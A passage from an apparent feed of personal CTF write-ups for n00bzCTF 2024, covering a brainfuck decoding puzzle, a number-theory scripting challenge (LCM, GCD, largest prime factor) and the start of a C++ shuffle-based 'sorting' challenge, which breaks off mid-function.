<span class="nb">print</span><span class="p">(</span><span class="n">received_reply</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"< "</span> <span class="o">+</span> <span class="n">received_reply</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></div>Brain2024-08-04T00:00:00+02:002024-08-04T00:00:00+02:00moormastertag:moormaster.codeberg.page,2024-08-04:/CtfWriteups/brain.html<p>We are presented a string in <a href="https://en.wikipedia.org/wiki/Brainfuck">brainfuck</a> language. The first thing we notice that it is not outputting anything (not a single '.' character in it).</p>
<div class="highlight"><pre><span></span><code><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
</code></pre></div>
<p>The next thing that jumps into ones eye are these <code><[-]</code>. The <code><</code> jumps right back into the previous memory cell while <code>[-]</code> is equal to</p>
<div class="highlight"><pre><span></span><code><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">cell_value …</span></code></pre></div><p>We are presented a string in <a href="https://en.wikipedia.org/wiki/Brainfuck">brainfuck</a> language. The first thing we notice that it is not outputting anything (not a single '.' character in it).</p>
<div class="highlight"><pre><span></span><code><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
<span class="nv">></span><span class="nb">+++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span><span class="nv">></span><span class="nb">+++++++++++++++++++++++++</span><span class="k">[</span><span class="nv"><</span><span class="nb">+++++</span><span class="nv">></span><span class="nb">-</span><span class="k">]</span><span class="nv"><</span><span class="k">[</span><span class="nb">-</span><span class="k">]</span>
</code></pre></div>
<p>The next thing that jumps into ones eye are these <code><[-]</code>. The <code><</code> jumps right back into the previous memory cell while <code>[-]</code> is equal to</p>
<div class="highlight"><pre><span></span><code><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">cell_value</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cell_value</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">--</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>and causes whatever value was written into that cell before to be decreased to 0 again.</p>
<p>Since we are curious we want to output each of these values before they get neutralized again. So our task here is to simply insert a <code>.</code> command into each of the <code><[-]</code> commands: <code><.[-]</code></p>
<p>Putting the resulting <code>brainfuck</code> code into a brainfuck interpreter will now give us the flag.</p>N00bzCTF2024-08-04T00:00:00+02:002024-08-04T00:00:00+02:00moormastertag:moormaster.codeberg.page,2024-08-04:/CtfWriteups/n00bzctf.html<p>URL: <a href="https://ctf.n00bzunit3d.xyz">N00BZCTF</a></p>
<p>Writeups can be found at <a href="https://moormaster.codeberg.page/CtfWriteups/category/n00bzctf-2024.html">N00bzCtf-2024</a></p>Numbers22024-08-04T00:00:00+02:002024-08-04T00:00:00+02:00moormastertag:moormaster.codeberg.page,2024-08-04:/CtfWriteups/numbers2.html<p>Numbers2 is the successor of an older challenge presented at <a href="https://github.com/n00bzUnit3d/n00bzCTF2023-OfficalWriteups/tree/master/Misc/Numbers">N00bzCtf 2023</a> with a few differences:</p>
<ul>
<li>It outputs and additional welcome message</li>
<li>It asks for three different challenge questions</li>
<li>successful solving attempts are being answered with different responses</li>
</ul>
<p>We have to solve several programming challenges here:</p>
<ol>
<li>Challenge inputs do not …</li></ol><p>Numbers2 is the successor of an older challenge presented at <a href="https://github.com/n00bzUnit3d/n00bzCTF2023-OfficalWriteups/tree/master/Misc/Numbers">N00bzCtf 2023</a> with a few differences:</p>
<ul>
<li>It outputs and additional welcome message</li>
<li>It asks for three different challenge questions</li>
<li>successful solving attempts are being answered with different responses</li>
</ul>
<p>We have to solve several programming challenges here:</p>
<ol>
<li>Challenge inputs do not end on EOL but on ': ' instead. So we cannot simply use the <code>input()</code> function to read the questions from stdin</li>
<li>We have to parse two integers from within a line of text</li>
<li>Questions for the least common multiple or the greatest common divisor can be answered using the builtin methods from the math module <code>math.lcm()</code> / <code>math.gcd()</code>. But to answer the question asking for the largest prime factor we must implement an algorithm or an appropriate library from pip must be used</li>
</ol>
<p><code>1.</code> can easily be achieved using the <code>re.findall()</code> method:</p>
<div class="highlight"><pre><span></span><code><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s1">'\d+'</span><span class="p">,</span> <span class="s2">"Give me the greatest prime factor of 42"</span><span class="p">)</span>
<span class="c1"># x = 42</span>
<span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s1">'\d+'</span><span class="p">,</span> <span class="s2">"Give me the least common multiple of 42 and 23"</span><span class="p">)</span>
<span class="c1"># x = "42"</span>
<span class="c1"># x = "23"</span>
</code></pre></div>
<p>To solve <code>2.</code> we need to write an own implementation of an input method that stops reading single characters once it sees a ':'. We simply call <code>sys.stdin.read(1)</code> in a loop and decide whether to continue reading chars or not.</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span><span class="w"> </span><span class="nf">input_until_char</span><span class="p">(</span><span class="n">sep</span><span class="p">):</span>
<span class="n">input_read</span> <span class="o">=</span> <span class="s2">""</span>
<span class="n">c</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">input_read</span> <span class="o">+=</span> <span class="n">c</span>
<span class="k">while</span> <span class="n">c</span> <span class="o">!=</span> <span class="s2">""</span> <span class="ow">and</span> <span class="n">c</span> <span class="o">!=</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span> <span class="ow">and</span> <span class="n">c</span> <span class="o">!=</span> <span class="n">sep</span><span class="p">:</span>
<span class="n">c</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">input_read</span> <span class="o">+=</span> <span class="n">c</span>
<span class="k">return</span> <span class="n">input_read</span>
</code></pre></div>
<p>For <code>3.</code> a naive implementation of using a loop over all prime factor candidates to find out whether a candidate factor is prime is fast enough to find the largest prime factor:</p>
<div class="highlight"><pre><span></span><code><span class="n">largest_prime_factor</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="nb">int</span><span class="p">(</span><span class="n">x</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span>
<span class="n">is_prime</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">for</span> <span class="n">factor</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
<span class="k">if</span> <span class="n">n</span><span class="o">%</span><span class="n">factor</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">is_prime</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">break</span>
<span class="k">if</span> <span class="n">is_prime</span> <span class="ow">and</span> <span class="nb">int</span><span class="p">(</span><span class="n">x</span><span class="p">)</span><span class="o">%</span><span class="n">n</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">n</span> <span class="o">></span> <span class="n">largest_prime_factor</span><span class="p">:</span>
<span class="n">largest_prime_factor</span> <span class="o">=</span> <span class="n">n</span>
</code></pre></div>Random2024-08-04T00:00:00+02:002024-08-04T00:00:00+02:00moormastertag:moormaster.codeberg.page,2024-08-04:/CtfWriteups/random.html<p>We are given parts of the cpp source of the challenge. The main functions reads in a line and is doing some checks in the input</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="n">map</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="o">></span><span class="w"> </span><span class="n">counts</span><span class="p">;</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">s</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">counts</span><span class="p">[</span><span class="n">c</span><span class="p">])</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"no repeating letters allowed passed this machine"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">counts</span><span class="p">[</span><span class="n">c …</span></code></pre></div><p>We are given parts of the cpp source of the challenge. The main functions reads in a line and is doing some checks in the input</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="n">map</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="o">></span><span class="w"> </span><span class="n">counts</span><span class="p">;</span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">s</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">counts</span><span class="p">[</span><span class="n">c</span><span class="p">])</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"no repeating letters allowed passed this machine"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">counts</span><span class="p">[</span><span class="n">c</span><span class="p">]</span><span class="o">++</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">size</span><span class="p">()</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">10</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"this machine will only process worthy strings"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">size</span><span class="p">()</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">69</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"a very worthy string"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"i'll give you a clue'"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"just because something says it's random mean it actually is"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">69</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
</code></pre></div>
<p>after that the line input gets shuffled</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="n">random_shuffle</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">begin</span><span class="p">(),</span><span class="w"> </span><span class="n">s</span><span class="p">.</span><span class="n">end</span><span class="p">());</span>
</code></pre></div>
<p>... and a sorting algorithm is asked to sort the characters of the line</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">amazingcustomsortingalgorithm</span><span class="p">(</span><span class="n">s</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">ifstream</span><span class="w"> </span><span class="n">fin</span><span class="p">(</span><span class="s">"flag.txt"</span><span class="p">);</span>
<span class="w"> </span><span class="n">string</span><span class="w"> </span><span class="n">flag</span><span class="p">;</span>
<span class="w"> </span><span class="n">fin</span><span class="w"> </span><span class="o">>></span><span class="w"> </span><span class="n">flag</span><span class="p">;</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">flag</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="s">"UNWORTHY USER DETECTED"</span><span class="w"> </span><span class="o"><<</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
</code></pre></div>
<p>A quick look at the sort algorithm tells us that it is not really sorting but instead it checks if the input is already sorted and repeatedly (uo to 69 times) calls the <code>random_shuffle</code> method if the input is not sorted yet.</p>
<div class="highlight"><pre><span></span><code><span class="kt">bool</span><span class="w"> </span><span class="nf">amazingcustomsortingalgorithm</span><span class="p">(</span><span class="n">string</span><span class="w"> </span><span class="n">s</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">n</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">s</span><span class="p">.</span><span class="n">size</span><span class="p">();</span>
